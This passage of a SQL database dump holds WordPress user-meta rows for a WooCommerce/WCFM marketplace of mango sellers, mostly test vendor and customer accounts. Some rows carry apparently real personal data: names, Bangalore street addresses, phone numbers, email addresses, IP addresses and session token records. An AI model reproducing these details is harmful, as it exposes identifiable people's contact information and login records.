whatsapp-number\";s:0:\"\";s:24:\"any-other-contact-number\";s:0:\"\";}'),(643,15,'total-acres-of-mango-farm-land',''),(644,15,'varieties-of-mango-grown',''),(645,15,'last-year-yield',''),(646,15,'expected-yield-2022',''),(647,15,'whatsapp-number',''),(648,15,'any-other-contact-number',''),(649,15,'wcemailverified','true'),(651,15,'wc_last_active','1645660800'),(653,15,'wcfm_subscription_status','pending'),(655,15,'wcfmmp_profile_settings','a:9:{s:10:\"store_name\";s:4:\"Njjo\";s:6:\"social\";a:0:{}s:7:\"payment\";a:0:{}s:5:\"phone\";s:0:\"\";s:10:\"show_email\";s:2:\"no\";s:8:\"location\";s:0:\"\";s:12:\"find_address\";s:0:\"\";s:6:\"banner\";i:0;s:16:\"customer_support\";a:0:{}}'),(656,15,'_wcfmmp_shipping','a:2:{s:28:\"_wcfmmp_user_shipping_enable\";s:3:\"yes\";s:26:\"_wcfmmp_user_shipping_type\";s:7:\"by_zone\";}'),(657,15,'_wcfmmp_profile_id','15'),(658,15,'_wcfmmp_unique_id','1645118880'),(659,15,'wcfm_register_on','1645056000'),(660,15,'_wcfmmp_avg_review_rating','0'),(661,15,'wcfm_vendor_store_hours_migrated','yes'),(662,15,'wcfm_register_member','yes'),(663,2,'_wcfm_vendor_tax_migrated','yes'),(666,16,'nickname','4dm16ec024.nimyajose'),(667,16,'first_name','4dm16ec024.nimyajose'),(668,16,'last_name',''),(669,16,'description',''),(670,16,'rich_editing','true'),(671,16,'syntax_highlighting','true'),(672,16,'comment_shortcuts','false'),(673,16,'admin_color','fresh'),(674,16,'use_ssl','0'),(675,16,'show_admin_bar_front',''),(676,16,'locale',''),(677,16,'wp_capabilities','a:1:{s:11:\"wcfm_vendor\";b:1;}'),(678,16,'wp_user_level','6'),(679,16,'last_update','1645507058'),(680,16,'dismissed_wp_pointers',''),(681,16,'store_name','aqw'),(682,16,'wcfmmp_store_name','aqw'),(684,16,'wcfmvm_custom_infos','a:6:{s:30:\"total-acres-of-mango-farm-land\";s:0:\"\";s:24:\"varieties-of-mango-grown\";s:0:\"\";s:15:\"last-year-yield\";s:0:\"\";s:19:\"expected-yield-2022\";s:0:\"\";s:15:\"whatsapp-number\";s:0:\"\";s:24:\"any-other-contact-number\";s:0:\"\";}'),(685,16,'total-acres-of-mango-farm-land',''),(686,16,'varieties-of-mango-grown',''),(687,16,'last-year-yield',''),(688,16,'expected-yield-2022',''),(689,16,'whatsapp-number',''),(690,16,'any-other-contact-number',''),(691,16,'wcemailverified','true'),(692,16,'wcfm_subscription_status','pending'),(695,16,'wc_last_active','1645488000'),(696,1,'session_tokens','a:1:{s:64:\"eb4bb04f7fce9672453834a590ce1ffaf77f93221358b2a865e5ce47e5bd7576\";a:4:{s:10:\"expiration\";i:1684062982;s:2:\"ip\";s:14:\"152.58.218.168\";s:2:\"ua\";s:111:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36\";s:5:\"login\";i:1683890182;}}'),(698,16,'wcfmmp_profile_settings','a:9:{s:10:\"store_name\";s:3:\"aqw\";s:6:\"social\";a:0:{}s:7:\"payment\";a:0:{}s:5:\"phone\";s:0:\"\";s:10:\"show_email\";s:2:\"no\";s:8:\"location\";s:0:\"\";s:12:\"find_address\";s:0:\"\";s:6:\"banner\";i:0;s:16:\"customer_support\";a:0:{}}'),(699,16,'_wcfmmp_shipping','a:2:{s:28:\"_wcfmmp_user_shipping_enable\";s:3:\"yes\";s:26:\"_wcfmmp_user_shipping_type\";s:7:\"by_zone\";}'),(700,16,'_wcfmmp_profile_id','16'),(701,16,'_wcfmmp_unique_id','1645527077'),(702,16,'wcfm_register_on','1645488000'),(703,16,'_wcfmmp_avg_review_rating','0'),(704,16,'wcfm_vendor_store_hours_migrated','yes'),(705,16,'wcfm_register_member','yes'),(706,16,'session_tokens','a:1:{s:64:\"21d11f0237500cf0756c046b63edcfda04db6e9af6c1b4c0ddeffc7ddb9ef54d\";a:4:{s:10:\"expiration\";i:1645680152;s:2:\"ip\";s:13:\"157.50.10.124\";s:2:\"ua\";s:126:\"Mozilla/5.0 (Linux; Android 11; Redmi Note 8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.101 Mobile Safari/537.36\";s:5:\"login\";i:1645507352;}}'),(708,16,'_previous_login',''),(709,16,'_current_login','1645527152'),(710,16,'_woocommerce_persistent_cart_1','a:1:{s:4:\"cart\";a:0:{}}'),(711,16,'_store_setup','yes'),(755,18,'nickname','archana'),(756,18,'first_name','archana'),(757,18,'last_name',''),(758,18,'description',''),(759,18,'rich_editing','true'),(760,18,'syntax_highlighting','true'),(761,18,'comment_shortcuts','false'),(762,18,'admin_color','fresh'),(763,18,'use_ssl','0'),(764,18,'show_admin_bar_front',''),(765,18,'locale',''),(766,18,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(767,18,'wp_user_level','0'),(768,18,'last_update','1645617301'),(769,18,'dismissed_wp_pointers',''),(770,18,'store_name','testing store'),(771,18,'wcfmmp_store_name','testing store'),(772,18,'wcfmvm_custom_infos','a:6:{s:30:\"total-acres-of-mango-farm-land\";s:0:\"\";s:24:\"varieties-of-mango-grown\";s:0:\"\";s:15:\"last-year-yield\";s:0:\"\";s:19:\"expected-yield-2022\";s:0:\"\";s:15:\"whatsapp-number\";s:0:\"\";s:24:\"any-other-contact-number\";s:0:\"\";}'),(773,18,'total-acres-of-mango-farm-land',''),(774,18,'varieties-of-mango-grown',''),(775,18,'last-year-yield',''),(776,18,'expected-yield-2022',''),(777,18,'whatsapp-number',''),(778,18,'any-other-contact-number',''),(779,18,'wcemailverified','true'),(781,18,'wc_last_active','1645574400'),(782,19,'nickname','Asdfghj'),(783,19,'first_name','Asdfghj'),(784,19,'last_name',''),(785,19,'description',''),(786,19,'rich_editing','true'),(787,19,'syntax_highlighting','true'),(788,19,'comment_shortcuts','false'),(789,19,'admin_color','fresh'),(790,19,'use_ssl','0'),(791,19,'show_admin_bar_front',''),(792,19,'locale',''),(793,19,'wp_capabilities','a:1:{s:11:\"wcfm_vendor\";b:1;}'),(794,19,'wp_user_level','6'),(795,19,'last_update','1645617819'),(796,19,'dismissed_wp_pointers',''),(797,19,'store_name','Mmm'),(798,19,'wcfmmp_store_name','Mmm'),(800,19,'wcfmvm_custom_infos','a:6:{s:30:\"total-acres-of-mango-farm-land\";s:0:\"\";s:24:\"varieties-of-mango-grown\";s:0:\"\";s:15:\"last-year-yield\";s:0:\"\";s:19:\"expected-yield-2022\";s:0:\"\";s:15:\"whatsapp-number\";s:0:\"\";s:24:\"any-other-contact-number\";s:0:\"\";}'),(801,19,'total-acres-of-mango-farm-land',''),(802,19,'varieties-of-mango-grown',''),(803,19,'last-year-yield',''),(804,19,'expected-yield-2022',''),(805,19,'whatsapp-number',''),(806,19,'any-other-contact-number',''),(807,19,'wcemailverified','true'),(808,19,'wcfm_subscription_status','pending'),(811,19,'wc_last_active','1645574400'),(812,19,'wcfmmp_profile_settings','a:9:{s:10:\"store_name\";s:3:\"Mmm\";s:6:\"social\";a:0:{}s:7:\"payment\";a:0:{}s:5:\"phone\";s:0:\"\";s:10:\"show_email\";s:2:\"no\";s:8:\"location\";s:0:\"\";s:12:\"find_address\";s:0:\"\";s:6:\"banner\";i:0;s:16:\"customer_support\";a:0:{}}'),(813,19,'_wcfmmp_shipping','a:2:{s:28:\"_wcfmmp_user_shipping_enable\";s:3:\"yes\";s:26:\"_wcfmmp_user_shipping_type\";s:7:\"by_zone\";}'),(814,19,'_wcfmmp_profile_id','19'),(815,19,'_wcfmmp_unique_id','1645637750'),(816,19,'wcfm_register_on','1645574400'),(817,19,'_wcfmmp_avg_review_rating','0'),(818,19,'wcfm_vendor_store_hours_migrated','yes'),(819,19,'wcfm_register_member','yes'),(820,19,'_store_setup','yes'),(821,20,'nickname','Pavitra'),(822,20,'first_name','pavithra'),(823,20,'last_name','g'),(824,20,'description',''),(825,20,'rich_editing','true'),(826,20,'syntax_highlighting','true'),(827,20,'comment_shortcuts','false'),(828,20,'admin_color','fresh'),(829,20,'use_ssl','0'),(830,20,'show_admin_bar_front','true'),(831,20,'locale',''),(832,20,'wp_capabilities','a:1:{s:11:\"wcfm_vendor\";b:1;}'),(833,20,'wp_user_level','6'),(834,20,'last_update','1645768504'),(835,20,'dismissed_wp_pointers',''),(836,20,'store_name','Testingstore'),(837,20,'wcfmmp_store_name','Testingstore'),(838,20,'wcfmvm_custom_infos','a:6:{s:30:\"total-acres-of-mango-farm-land\";s:0:\"\";s:24:\"varieties-of-mango-grown\";s:0:\"\";s:15:\"last-year-yield\";s:0:\"\";s:19:\"expected-yield-2022\";s:0:\"\";s:15:\"whatsapp-number\";s:0:\"\";s:24:\"any-other-contact-number\";s:0:\"\";}'),(839,20,'total-acres-of-mango-farm-land',''),(840,20,'varieties-of-mango-grown',''),(841,20,'last-year-yield',''),(842,20,'expected-yield-2022',''),(843,20,'whatsapp-number',''),(844,20,'any-other-contact-number',''),(845,20,'wcemailverified','true'),(846,20,'session_tokens','a:6:{s:64:\"4fee69fb9bc8ce88975130fecc63dab939fe7363e79a16b4c1eca18d682f41c4\";a:4:{s:10:\"expiration\";i:1646827813;s:2:\"ip\";s:11:\"27.7.143.76\";s:2:\"ua\";s:164:\"Mozilla/5.0 (Linux; Android 11; Redmi Note 8 Build/RKQ1.201004.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/98.0.4758.101 Mobile Safari/537.36\";s:5:\"login\";i:1645618213;}s:64:\"c1bf3ea8e501f0d159d4dd0f94b18c573453e29270cc889b9d154c3421049573\";a:4:{s:10:\"expiration\";i:1645791502;s:2:\"ip\";s:13:\"171.76.103.51\";s:2:\"ua\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36\";s:5:\"login\";i:1645618702;}s:64:\"77bedac08abc49bb355aa04d92da42df61f4588f3579d197101f50093740b8f1\";a:4:{s:10:\"expiration\";i:1646828698;s:2:\"ip\";s:11:\"27.7.143.76\";s:2:\"ua\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36\";s:5:\"login\";i:1645619098;}s:64:\"ce81889305ab56329483538ae38445f161bff843f13925076bcdda52b4bbfe1d\";a:4:{s:10:\"expiration\";i:1645941499;s:2:\"ip\";s:12:\"122.167.88.3\";s:2:\"ua\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36\";s:5:\"login\";i:1645768699;}s:64:\"55155e8195abe2d6d932c89de2d32ab1db397fd7cd69361f448f2ce3e87a42d9\";a:4:{s:10:\"expiration\";i:1645960154;s:2:\"ip\";s:12:\"122.167.88.3\";s:2:\"ua\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36\";s:5:\"login\";i:1645787354;}s:64:\"a629011fd752c417b5a9bc9d9f469e64c123e9ff0bbd1525f5f06dabd7fb1351\";a:4:{s:10:\"expiration\";i:1646997815;s:2:\"ip\";s:12:\"122.167.88.3\";s:2:\"ua\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36\";s:5:\"login\";i:1645788215;}}'),(847,20,'wc_last_active','1645747200'),(849,20,'wcfm_subscription_status','pending'),(851,20,'wcfmmp_profile_settings','a:9:{s:10:\"store_name\";s:12:\"Testingstore\";s:6:\"social\";a:0:{}s:7:\"payment\";a:0:{}s:5:\"phone\";s:0:\"\";s:10:\"show_email\";s:2:\"no\";s:8:\"location\";s:0:\"\";s:12:\"find_address\";s:0:\"\";s:6:\"banner\";i:0;s:16:\"customer_support\";a:0:{}}'),(852,20,'_wcfmmp_shipping','a:2:{s:28:\"_wcfmmp_user_shipping_enable\";s:3:\"yes\";s:26:\"_wcfmmp_user_shipping_type\";s:7:\"by_zone\";}'),(853,20,'_wcfmmp_profile_id','20'),(854,20,'_wcfmmp_unique_id','1645638193'),(855,20,'wcfm_register_on','1645574400'),(856,20,'_wcfmmp_avg_review_rating','0'),(857,20,'wcfm_vendor_store_hours_migrated','yes'),(858,20,'wcfm_register_member','yes'),(860,20,'_previous_login','1645807154'),(861,20,'_current_login','1645808015'),(863,20,'_store_setup','yes'),(868,15,'_store_setup','yes'),(873,21,'nickname','bhavani'),(874,21,'first_name',''),(875,21,'last_name',''),(876,21,'description',''),(877,21,'rich_editing','true'),(878,21,'syntax_highlighting','true'),(879,21,'comment_shortcuts','false'),(880,21,'admin_color','fresh'),(881,21,'use_ssl','0'),(882,21,'show_admin_bar_front',''),(883,21,'locale',''),(884,21,'wp_capabilities','a:1:{s:11:\"wcfm_vendor\";b:1;}'),(885,21,'wp_user_level','6'),(886,21,'billing_phone','7412435646'),(887,21,'aioseo_contact_methods_header',''),(888,21,'aioseo_twitter',''),(889,21,'aioseo_facebook',''),(890,21,'last_update','1646367862'),(891,21,'session_tokens','a:1:{s:64:\"61453cc9567709570d2f00628662e370d0f6c21dc6157163277737d9b9215138\";a:4:{s:10:\"expiration\";i:1656052788;s:2:\"ip\";s:11:\"27.7.31.211\";s:2:\"ua\";s:111:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36\";s:5:\"login\";i:1655879988;}}'),(892,21,'wc_last_active','1655856000'),(893,21,'billing_first_name','bavani'),(894,21,'billing_last_name','p'),(895,21,'billing_address_1','800 ,spandana towers'),(896,21,'billing_address_2','hsr layout'),(897,21,'billing_city','bangalore'),(898,21,'billing_state','KA'),(899,21,'billing_postcode','560102'),(900,21,'billing_country','IN'),(901,21,'billing_email','bhavani@utfindia.in'),(902,21,'shipping_first_name','bavani'),(903,21,'shipping_last_name','p'),(904,21,'shipping_address_1','800 ,spandana towers'),(905,21,'shipping_address_2','hsr layout'),(906,21,'shipping_city','bangalore'),(907,21,'shipping_state','KA'),(908,21,'shipping_postcode','560102'),(909,21,'shipping_country','IN'),(910,21,'shipping_method','a:2:{i:2;s:11:\"flat_rate:3\";i:25;s:11:\"flat_rate:3\";}'),(911,21,'paying_customer','1'),(913,22,'nickname','chethan'),(914,22,'first_name','chethan'),(915,22,'last_name',''),(916,22,'description',''),(917,22,'rich_editing','true'),(918,22,'syntax_highlighting','true'),(919,22,'comment_shortcuts','false'),(920,22,'admin_color','fresh'),(921,22,'use_ssl','0'),(922,22,'show_admin_bar_front',''),(923,22,'locale',''),(924,22,'wp_capabilities','a:1:{s:11:\"wcfm_vendor\";b:1;}'),(925,22,'wp_user_level','6'),(926,22,'last_update','1645695633'),(927,22,'dismissed_wp_pointers',''),(928,22,'store_name','test store 6'),(929,22,'wcfmmp_store_name','test store 6'),(931,22,'wcfmvm_custom_infos','a:6:{s:30:\"total-acres-of-mango-farm-land\";s:5:\"India\";s:24:\"varieties-of-mango-grown\";s:0:\"\";s:15:\"last-year-yield\";s:0:\"\";s:19:\"expected-yield-2022\";s:0:\"\";s:15:\"whatsapp-number\";s:0:\"\";s:24:\"any-other-contact-number\";s:11:\"01234567890\";}'),(932,22,'total-acres-of-mango-farm-land','India'),(933,22,'varieties-of-mango-grown',''),(934,22,'last-year-yield',''),(935,22,'expected-yield-2022',''),(936,22,'whatsapp-number',''),(937,22,'any-other-contact-number','01234567890'),(938,22,'wcemailverified','true'),(939,22,'wcfm_subscription_status','pending'),(942,22,'wc_last_active','1645660800'),(944,22,'wcfmmp_profile_settings','a:9:{s:10:\"store_name\";s:12:\"test store 6\";s:6:\"social\";a:0:{}s:7:\"payment\";a:0:{}s:5:\"phone\";s:0:\"\";s:10:\"show_email\";s:2:\"no\";s:8:\"location\";s:0:\"\";s:12:\"find_address\";s:0:\"\";s:6:\"banner\";i:0;s:16:\"customer_support\";a:0:{}}'),(945,22,'_wcfmmp_shipping','a:2:{s:28:\"_wcfmmp_user_shipping_enable\";s:3:\"yes\";s:26:\"_wcfmmp_user_shipping_type\";s:7:\"by_zone\";}'),(946,22,'_wcfmmp_profile_id','22'),(947,22,'_wcfmmp_unique_id','1645715564'),(948,22,'wcfm_register_on','1645660800'),(949,22,'_wcfmmp_avg_review_rating','0'),(950,22,'wcfm_vendor_store_hours_migrated','yes'),(951,22,'wcfm_register_member','yes'),(954,22,'_previous_login','1645716183'),(955,22,'_current_login','1645717127'),(956,22,'_woocommerce_persistent_cart_1','a:1:{s:4:\"cart\";a:0:{}}'),(957,22,'_store_setup','yes'),(959,15,'aioseo_contact_methods_header',''),(960,15,'aioseo_twitter',''),(961,15,'aioseo_facebook',''),(962,20,'aioseo_contact_methods_header',''),(963,20,'aioseo_twitter',''),(964,20,'aioseo_facebook',''),(965,15,'session_tokens','a:1:{s:64:\"e7bf3564503c49fcae5f75cc1be35e6185ac9d1130758c9fa7d01d067d10ca9a\";a:4:{s:10:\"expiration\";i:1645869744;s:2:\"ip\";s:12:\"122.167.88.3\";s:2:\"ua\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36\";s:5:\"login\";i:1645696944;}}'),(967,15,'_previous_login',''),(968,15,'_current_login','1645716744'),(969,15,'_woocommerce_persistent_cart_1','a:1:{s:4:\"cart\";a:0:{}}'),(971,20,'billing_first_name','pavithra'),(972,20,'billing_last_name','g'),(973,20,'billing_address_1','#800 Spandana towers , 19th main road .hsr layout 2nd sector'),(974,20,'billing_address_2','near golden fresh super market'),(975,20,'billing_city','bangalore'),(976,20,'billing_state','KA'),(977,20,'billing_postcode','560102'),(978,20,'billing_country','IN'),(979,20,'billing_email','Pavitra@utfindia.in'),(980,20,'billing_phone','07411722844'),(981,20,'shipping_first_name','pavithra'),(982,20,'shipping_last_name','g'),(983,20,'shipping_address_1','#800 Spandana towers , 19th main road .hsr layout 2nd sector'),(984,20,'shipping_address_2','near golden fresh super market'),(985,20,'shipping_city','bangalore'),(986,20,'shipping_state','KA'),(987,20,'shipping_postcode','560102'),(988,20,'shipping_country','IN'),(989,20,'shipping_method','a:2:{i:0;s:11:\"flat_rate:3\";i:22;s:11:\"flat_rate:3\";}'),(990,20,'paying_customer','1'),(995,20,'_woocommerce_persistent_cart_1','a:1:{s:4:\"cart\";a:0:{}}'),(998,21,'_previous_login','1652887483'),(999,21,'_current_login','1655899789'),(1006,23,'nickname','sarchana1298'),(1007,23,'first_name',''),(1008,23,'last_name',''),(1009,23,'description',''),(1010,23,'rich_editing','true'),(1011,23,'syntax_highlighting','true'),(1012,23,'comment_shortcuts','false'),(1013,23,'admin_color','fresh'),(1014,23,'use_ssl','0'),(1015,23,'show_admin_bar_front','true'),(1016,23,'locale',''),(1017,23,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(1018,23,'wp_user_level','0'),(1019,23,'billing_phone','7259583089'),(1020,23,'aioseo_contact_methods_header',''),(1021,23,'aioseo_twitter',''),(1022,23,'aioseo_facebook',''),(1023,23,'last_update','1645700993'),(1025,23,'wc_last_active','1645660800'),(1026,23,'session_tokens','a:1:{s:64:\"14fe0b01896316d7217bc2b50223f9032006975d6ef84b2d4dcc88ef895f0f7d\";a:4:{s:10:\"expiration\";i:1645873822;s:2:\"ip\";s:11:\"27.7.143.76\";s:2:\"ua\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36\";s:5:\"login\";i:1645701022;}}'),(1028,23,'_previous_login',''),(1029,23,'_current_login','1645720822'),(1030,23,'_woocommerce_persistent_cart_1','a:1:{s:4:\"cart\";a:0:{}}'),(1032,24,'nickname','prajwal'),(1033,24,'first_name',''),(1034,24,'last_name',''),(1035,24,'description',''),(1036,24,'rich_editing','true'),(1037,24,'syntax_highlighting','true'),(1038,24,'comment_shortcuts','false'),(1039,24,'admin_color','fresh'),(1040,24,'use_ssl','0'),(1041,24,'show_admin_bar_front','true'),(1042,24,'locale',''),(1043,24,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(1044,24,'wp_user_level','0'),(1045,24,'billing_phone','7411722844'),(1046,24,'aioseo_contact_methods_header',''),(1047,24,'aioseo_twitter',''),(1048,24,'aioseo_facebook',''),(1049,24,'last_update','1645710511'),(1050,24,'session_tokens','a:1:{s:64:\"5b652bc1b3b0d7879525091ec0da55b37e1c3bc48adf18bbbc3c9f21f6d9bda0\";a:4:{s:10:\"expiration\";i:1646920112;s:2:\"ip\";s:14:\"223.237.241.57\";s:2:\"ua\";s:122:\"Mozilla/5.0 (Linux; Android 11; SM-M326B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.101 Mobile Safari/537.36\";s:5:\"login\";i:1645710512;}}'),(1058,20,'_wcfm_vendor_tax_migrated','yes'),(1079,22,'_wcfm_vendor_tax_migrated','yes'),(1085,1,'manageedit-shop_ordercolumnshidden','a:4:{i:0;s:16:\"shipping_address\";i:1;s:15:\"billing_address\";i:2;s:10:\"wc_actions\";i:3;s:10:\"wc_actions\";}'),(1086,25,'nickname','xyzabc9980'),(1087,25,'first_name','xyzabc9980'),(1088,25,'last_name',''),(1089,25,'description',''),(1090,25,'rich_editing','true'),(1091,25,'syntax_highlighting','true'),(1092,25,'comment_shortcuts','false'),(1093,25,'admin_color','fresh'),(1094,25,'use_ssl','0'),(1095,25,'show_admin_bar_front',''),(1096,25,'locale',''),(1097,25,'wp_capabilities','a:1:{s:11:\"wcfm_vendor\";b:1;}'),(1098,25,'wp_user_level','6'),(1099,25,'last_update','1646284518'),(1100,25,'dismissed_wp_pointers',''),(1101,25,'store_name','xyz'),(1102,25,'wcfmmp_store_name','xyz'),(1104,25,'wcfmvm_custom_infos','a:6:{s:30:\"total-acres-of-mango-farm-land\";s:0:\"\";s:24:\"varieties-of-mango-grown\";s:0:\"\";s:15:\"last-year-yield\";s:0:\"\";s:19:\"expected-yield-2022\";s:0:\"\";s:15:\"whatsapp-number\";s:0:\"\";s:24:\"any-other-contact-number\";s:0:\"\";}'),(1105,25,'total-acres-of-mango-farm-land',''),(1106,25,'varieties-of-mango-grown',''),(1107,25,'last-year-yield',''),(1108,25,'expected-yield-2022',''),(1109,25,'whatsapp-number',''),(1110,25,'any-other-contact-number',''),(1111,25,'wcemailverified','true'),(1112,25,'wcfm_subscription_status','pending'),(1115,25,'wc_last_active','1647302400'),(1117,25,'wcfmmp_profile_settings','a:51:{s:10:\"store_name\";s:3:\"xyz\";s:6:\"social\";a:0:{}s:7:\"payment\";a:0:{}s:5:\"phone\";s:0:\"\";s:10:\"show_email\";s:2:\"no\";s:8:\"location\";s:0:\"\";s:12:\"find_address\";s:0:\"\";s:6:\"banner\";s:0:\"\";s:16:\"customer_support\";a:8:{s:5:\"phone\";s:0:\"\";s:5:\"email\";s:0:\"\";s:8:\"address1\";s:0:\"\";s:8:\"address2\";s:0:\"\";s:7:\"country\";s:2:\"IN\";s:4:\"city\";s:0:\"\";s:5:\"state\";s:0:\"\";s:3:\"zip\";s:0:\"\";}s:10:\"store_slug\";s:3:\"xyz\";s:11:\"store_email\";s:20:\"xyzabc9980@gmail.com\";s:8:\"gravatar\";s:0:\"\";s:11:\"banner_type\";s:10:\"single_img\";s:12:\"banner_video\";s:0:\"\";s:13:\"banner_slider\";a:1:{i:0;a:2:{s:5:\"image\";s:0:\"\";s:4:\"link\";s:0:\"\";}}s:13:\"mobile_banner\";s:0:\"\";s:16:\"list_banner_type\";s:10:\"single_img\";s:11:\"list_banner\";s:0:\"\";s:17:\"list_banner_video\";s:0:\"\";s:16:\"shop_description\";s:11:\"<p><br></p>\";s:19:\"store_name_position\";s:9:\"on_banner\";s:9:\"store_ppp\";s:2:\"10\";s:7:\"address\";a:6:{s:8:\"street_1\";s:0:\"\";s:8:\"street_2\";s:0:\"\";s:4:\"city\";s:0:\"\";s:3:\"zip\";s:0:\"\";s:7:\"country\";s:2:\"IN\";s:5:\"state\";s:0:\"\";}s:11:\"geolocation\";a:3:{s:14:\"store_location\";s:0:\"\";s:9:\"store_lat\";s:10:\"30.0599153\";s:9:\"store_lng\";s:10:\"31.2620199\";}s:15:\"wcfmmp_shipping\";a:3:{s:28:\"_wcfmmp_user_shipping_enable\";s:3:\"yes\";s:10:\"_wcfmmp_pt\";s:1:\"9\";s:26:\"_wcfmmp_user_shipping_type\";s:7:\"by_zone\";}s:26:\"wcfmmp_shipping_by_country\";a:6:{s:27:\"_wcfmmp_shipping_type_price\";s:0:\"\";s:26:\"_wcfmmp_additional_product\";s:0:\"\";s:22:\"_wcfmmp_additional_qty\";s:0:\"\";s:21:\"_free_shipping_amount\";s:0:\"\";s:18:\"_local_pickup_cost\";s:0:\"\";s:21:\"_wcfmmp_form_location\";s:0:\"\";}s:21:\"wcfmmp_shipping_rates\";a:1:{i:0;a:3:{s:17:\"wcfmmp_country_to\";s:0:\"\";s:23:\"wcfmmp_country_to_price\";s:1:\"0\";s:27:\"wcfmmp_shipping_state_rates\";a:1:{i:0;a:2:{s:15:\"wcfmmp_state_to\";s:0:\"\";s:21:\"wcfmmp_state_to_price\";s:1:\"0\";}}}}s:20:\"wcfmmp_shipping_zone\";a:2:{i:3;a:2:{s:8:\"_zone_id\";s:1:\"3\";s:22:\"_select_zone_postcodes\";s:0:\"\";}i:25;a:1:{s:8:\"_user_id\";s:2:\"25\";}}s:18:\"method_id_selected\";s:0:\"\";s:20:\"instance_id_selected\";s:0:\"\";s:12:\"method_title\";s:0:\"\";s:20:\"minimum_order_amount\";s:0:\"\";s:18:\"method_description\";s:0:\"\";s:11:\"method_cost\";s:0:\"\";s:17:\"method_tax_status\";s:4:\"none\";s:19:\"shipping_class_cost\";a:1:{i:0;s:0:\"\";}s:16:\"calculation_type\";s:5:\"class\";s:25:\"wcfmmp_shipping_by_weight\";a:2:{s:21:\"_free_shipping_amount\";s:3:\"500\";s:18:\"_local_pickup_cost\";s:0:\"\";}s:31:\"wcfmmp_shipping_rates_by_weight\";a:1:{i:0;a:5:{s:28:\"wcfmmp_weightwise_country_to\";s:0:\"\";s:30:\"wcfmmp_weightwise_country_mode\";s:7:\"by_rule\";s:39:\"wcfmmp_weightwise_country_per_unit_cost\";s:1:\"0\";s:38:\"wcfmmp_weightwise_country_default_cost\";s:1:\"0\";s:39:\"wcfmmp_shipping_country_weight_settings\";a:1:{i:0;a:3:{s:18:\"wcfmmp_weight_rule\";s:5:\"up_to\";s:18:\"wcfmmp_weight_unit\";s:0:\"\";s:19:\"wcfmmp_weight_price\";s:0:\"\";}}}}s:9:\"store_seo\";a:9:{s:21:\"wcfmmp-seo-meta-title\";s:0:\"\";s:20:\"wcfmmp-seo-meta-desc\";s:0:\"\";s:24:\"wcfmmp-seo-meta-keywords\";s:0:\"\";s:19:\"wcfmmp-seo-og-title\";s:0:\"\";s:18:\"wcfmmp-seo-og-desc\";s:0:\"\";s:19:\"wcfmmp-seo-og-image\";s:0:\"\";s:24:\"wcfmmp-seo-twitter-title\";s:0:\"\";s:23:\"wcfmmp-seo-twitter-desc\";s:0:\"\";s:24:\"wcfmmp-seo-twitter-image\";s:0:\"\";}s:10:\"wcfm_nonce\";s:10:\"4ee565518a\";s:16:\"store_hide_email\";s:2:\"no\";s:16:\"store_hide_phone\";s:2:\"no\";s:18:\"store_hide_address\";s:2:\"no\";s:14:\"store_hide_map\";s:2:\"no\";s:22:\"store_hide_description\";s:2:\"no\";s:17:\"store_hide_policy\";s:2:\"no\";s:14:\"store_location\";s:0:\"\";s:9:\"store_lat\";s:10:\"30.0599153\";s:9:\"store_lng\";s:10:\"31.2620199\";s:13:\"method_status\";s:1:\"4\";}'),(1118,25,'_wcfmmp_shipping','a:3:{s:28:\"_wcfmmp_user_shipping_enable\";s:3:\"yes\";s:10:\"_wcfmmp_pt\";s:1:\"9\";s:26:\"_wcfmmp_user_shipping_type\";s:7:\"by_zone\";}'),(1119,25,'_wcfmmp_profile_id','25'),(1120,25,'_wcfmmp_unique_id','1646304572'),(1121,25,'wcfm_register_on','1646265600'),(1122,25,'_wcfmmp_avg_review_rating','0'),(1123,25,'wcfm_vendor_store_hours_migrated','yes'),(1124,25,'wcfm_register_member','yes'),(1127,25,'_previous_login','1646759409'),(1128,25,'_current_login','1647350467'),(1129,25,'_woocommerce_persistent_cart_1','a:1:{s:4:\"cart\";a:1:{s:32:\"a42a596fc71e17828440030074d15e74\";a:11:{s:3:\"key\";s:32:\"a42a596fc71e17828440030074d15e74\";s:10:\"product_id\";i:1194;s:12:\"variation_id\";i:0;s:9:\"variation\";a:0:{}s:8:\"quantity\";i:2;s:9:\"data_hash\";s:32:\"b5c1d5ca8bae6d4896cf1807cdf763f0\";s:13:\"line_tax_data\";a:2:{s:8:\"subtotal\";a:0:{}s:5:\"total\";a:0:{}}s:13:\"line_subtotal\";d:999;s:17:\"line_subtotal_tax\";i:0;s:10:\"line_total\";d:999;s:8:\"line_tax\";i:0;}}}'),(1130,25,'_store_setup','yes'),(1141,1,'wpdesk_id','3a20f076-8ef2-4345-b8aa-ef733f77c217'),(1142,1,'fs_nps','a:2:{s:13:\"dismiss_count\";i:1;s:12:\"dismiss_time\";i:1646307782;}'),(1143,1,'woocommerce_admin_task_list_tracked_started_tasks','{\"tax\":1,\"marketing\":1}'),(1146,1,'meta-box-order_product','a:3:{s:4:\"side\";s:121:\"wcfm-view,submitdiv,pwb-branddiv,